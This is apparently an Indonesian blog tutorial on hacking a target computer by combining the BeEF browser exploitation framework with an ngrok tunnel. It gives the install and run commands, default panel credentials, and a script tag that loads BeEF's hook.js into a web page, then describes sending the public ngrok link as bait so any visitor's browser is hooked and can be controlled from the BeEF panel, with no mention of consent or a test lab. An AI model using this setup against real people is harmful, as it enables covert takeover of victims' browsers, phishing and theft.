 |
| Hack Komputer Target Menggunakan Beef+Ngrok |
Apa itu BeEF?
BeEF adalah singkatan dari Browser Exploitation Framework, adalah sebuah alat uji untuk penetration yang fokus dengan web browser.
BeEF memungkinkan untuk melakukan penetrasi dengan menilai postur keamanan aktual dari lingkungan target, dengan menggunakan vektor serangan sisi klien.
Pada tulisan ini, saya mencontohkan cara penggunaan BeEF, yang telah saya padukan penggunaannya dengan menggunakan tunnel (ngrok).
Pertama, siapkan terlebih dahulu:
1. Ngrok
2. BeEF
Jika belum ada, silahkan install terlebih dahulu
Untuk installasi Ngrok, silahkan buka artikel saya lainnya pada link ini.
Untuk BeEF, biasanya sudah satu paket dengan Kali Linux, tapi jika belum ada, lakukan saja installasi seperti biasa.
# apt-get install beef-xss
Jika semua bahan sudah terinstal, sekarang aktifkan ngrok pada port 80 (http), menggunakan terminal.
masuk ke folder instalasi ngrok, dimana tempat sobat meletakkan file ngrok sebelumnya. dan aktifkan ngrok nya:
# ./ngrok http 80
link forwarding yang diberikan ini sebagai penghubung dari komputer target ke BeEF kita.
Selanjutnya, buka new terminal. dan aktifkan service apache:
# service apache2 start
cek apakah apache telah running atau tidak:
# service apache2 status
Jika didapat tulisan seperti ini (tulisan yang disorot), artinya apache telah diaktifkan.
Kemudian jalankan BeEF
# beef-xss
setelah BeEF dijalankan, buka browser dan ketikkan pada address barnya:
127.0.0.1:3000/ui/panel
secara default, port BeEF adalah 3000, tergantung pada setting BeEF sobat.
untuk pertama kali dijalankan, untuk bisa masuk ke dalam panel, BeEF akan melakukan authentication.
user: beef
pass: beef
jika user dan password tersebut tidak bisa, kemungkinan file "config.yaml" nya telah diedit, atau sudah pernah dilakukan aktivasi password sebelumnya. coba lakukan pembersihan cache beef:
# beef -x
dan coba ulangi lagi, masukkan user/password standar: beef/beef
langkah berikutnya, kita akan lakukan edit file terhadap "index.html" yang terletak pada
"var/www/html"
pada terminal, ketikkan:
# leafpad /var/www/html/index.html
leafpad adalah editor file teks, sobat bisa menggunakan editor lain, seperti nano, dsb. disini saya mencontohkan dengan menggunakan leafpad.
tambahkan satu baris command:
<script src="http://<IP>:3000/hook.js"></script>
disini ip lokal saya adalah: 192.168.100.27. sehingga contoh penulisannya adalah sebegai berikut:
<script src="http://192.168.100.27:3000/hook.js"></script>
letakkan baris command tersebut antara <head> dan </head> "dalam index.html", seperti ada contoh gambar dibawah ini:
simpan dan tutup file "index.html" tadi.
beralih ke teminal ngrok yang telah diaktifkan tadi, dan copy link forward yang diaktifkan.
link inilah yang nantinya akan menjadi umpan (bait) kepada komputer target. Tidak hanya komputer target saja, komputer mana saja ketika mengakses link ini, akan dibelokkan ngrok ke komputer kita, yang telah disisipkan script beef tadi.
seperti yang terlihat pada gambar dibawah ini, dimana pada komputer target ataupun komputer lainnya, akan mengakses link tersebut diatas.
komputer target akan diarahkan masuk ke dalam index.html milik kita, yang sudah disisipkan script BeEF.
Ketika komputer target masuk, akan muncul pemberitahuan dari panel BeEF.
Dari panel ini, kita sudah dapat masuk, memeriksa, sampai dengan mengendalikan komputer target, melalui panel BeEF ini.
lakukan beberapa testing menggunakan panel BeEF ini pada komputer target. Untuk lebih jelasnya, silahkan simak video dibawah ini, durasi 5 menit 56 detik.
Selamat mencoba, dan terimakasih.
pler
ReplyDelete